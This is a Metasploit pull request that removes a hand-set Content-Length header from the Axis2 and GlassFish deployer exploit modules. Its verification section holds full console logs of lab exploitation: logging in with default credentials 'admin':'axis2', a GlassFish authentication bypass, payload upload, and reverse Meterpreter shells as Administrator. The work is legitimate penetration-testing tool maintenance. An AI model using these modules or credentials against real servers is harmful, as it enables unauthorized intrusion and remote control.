### PR TITLE
[FixRM #8512]

### DIFF
--- a/modules/exploits/multi/http/axis2_deployer.rb
+++ b/modules/exploits/multi/http/axis2_deployer.rb
@@ -121,7 +121,6 @@ class Metasploit3 < Msf::Exploit::Remote
       'headers' =>
         {
           'Content-Type'	 => 'multipart/form-data; boundary=' + boundary,
-          'Content-Length' => data.length,
           'Cookie' => "JSESSIONID=#{session}",
         }
     }, 25)

--- a/modules/exploits/multi/http/glassfish_deployer.rb
+++ b/modules/exploits/multi/http/glassfish_deployer.rb
@@ -88,7 +88,6 @@ class Metasploit3 < Msf::Exploit::Remote
     headers = {}
     headers['Cookie'] = "JSESSIONID=#{session}" if session != ''
     headers['Content-Type'] = ctype if ctype != nil
-    headers['Content-Length'] = data.length if data != nil
 
     res = send_request_raw({
       'uri'     => path,


### PR DESCRIPTION
This pull request is a fix for https://dev.metasploit.com/redmine/issues/8512

**Verification axis2_deployer** 
- [ ] Install Win2003sp2 / Java 6 SDK
- [ ] Install tomcat6 from http://tomcat.apache.org/download-60.cgi
- [ ] Deploy axis2. I have used: axis2-1.6.0-war.zip, can be downloaded from http://axis.apache.org/axis2/java/core/download.cgi
- [ ] Run msfconsole,  use exploits/multi/http/axis2_deployer, exploit the target host, a session should be opened:

```
msf exploit(axis2_deployer) > rexploit
[*] Reloading module...

[*] Started reverse handler on 192.168.172.1:4444
[+] http://192.168.172.136:8080/axis2/axis2-admin [Apache-Coyote/1.1] [Axis2 Web Admin Module] successful login 'admin' : 'axis2'
[*] Successfully uploaded
[*] Polling to see if the service is ready
[*] Sending stage (30355 bytes) to 192.168.172.136
[*] Meterpreter session 3 opened (192.168.172.1:4444 -> 192.168.172.136:1750) at 2013-10-21 15:35:19 -0500

[*] NOTE: You will need to delete the web service that was uploaded.

[*] Using meterpreter:
[*] rm "webapps/axis2/WEB-INF/services/mdLFvgMv.jar"

[*] Using the shell:
[*] cd  "webapps/axis2/WEB-INF/services"
[*] del mdLFvgMv.jar


meterpreter > getuid
Server username: Administrator
meterpreter > sysinfo
Computer    : juan-6ed9db6ca8
OS          : Windows 2003 5.2 (x86)
Meterpreter : java/java
meterpreter > exit
[*] Shutting down Meterpreter...

[*] 192.168.172.136 - Meterpreter session 3 closed.  Reason: User exit
```

**Verification glassfish_deployer** 
- [ ] Install Win2003sp2 / Java 6 SDK
- [ ] Install / run glassfish 3.0.1 from here: http://download.java.net/glassfish/3.0.1/release/glassfish-3.0.1-ml.zip
- [ ] Run the glassfish service
- [ ] Run msfconsole,  use exploits/multi/http/glassfish_deployer, exploit the target host, a session should be opened. Tested with both java and windows sessions:

```
msf exploit(glassfish_deployer) > rexploit
[*] Reloading module...

[*] Started reverse handler on 192.168.172.1:4444
[*] Glassfish edition: GlassFish Server Open Source Edition 3.0.1
[*] Trying GlassFish authentication bypass..
[+] http://192.168.172.136:4848// - GlassFish - SUCCESSFUL authentication bypass
[*] Uploading payload...
[*] Successfully uploaded
[*] Executing /m4E4nCjWTGzHB9HnYexTl/CyxvwKNXIGBnw96TtXP46aRcVXD.jsp...
[*] Sending stage (770048 bytes) to 192.168.172.136
[*] Meterpreter session 2 opened (192.168.172.1:4444 -> 192.168.172.136:1634) at 2013-10-21 15:25:06 -0500
[*] Getting information to undeploy...
[*] Undeploying m4E4nCjWTGzHB9HnYexTl...
[*] Undeployment complete.

meterpreter > getuid
Server username: JUAN-6ED9DB6CA8\Administrator
meterpreter > sysinfo
Computer        : JUAN-6ED9DB6CA8
OS              : Windows .NET Server (Build 3790, Service Pack 2).
Architecture    : x86
System Language : en_US
Meterpreter     : x86/win32
meterpreter >



msf exploit(glassfish_deployer) > rexploit
[*] Reloading module...

[*] Started reverse handler on 192.168.172.1:4444
[*] Glassfish edition: GlassFish Server Open Source Edition 3.0.1
[*] Trying GlassFish authentication bypass..
[+] http://192.168.172.136:4848// - GlassFish - SUCCESSFUL authentication bypass
[*] Uploading payload...
[*] Successfully uploaded
[*] Executing /icDfejbl6Vc9ZobfgVv9LIBES/SV7fVtWuTQFZqtzMPiJ.jsp...
[*] Sending stage (30355 bytes) to 192.168.172.136
[*] Meterpreter session 1 opened (192.168.172.1:4444 -> 192.168.172.136:1472) at 2013-10-21 15:07:58 -0500
[*] Getting information to undeploy...
[*] Undeploying icDfejbl6Vc9ZobfgVv9LIBES...
[*] Undeployment complete.

meterpreter > getuid
Server username: Administrator
meterpreter > sysinfo
Computer    : juan-6ed9db6ca8
OS          : Windows 2003 5.2 (x86)
Meterpreter : java/java
meterpreter > exit
[*] Shutting down Meterpreter...
```
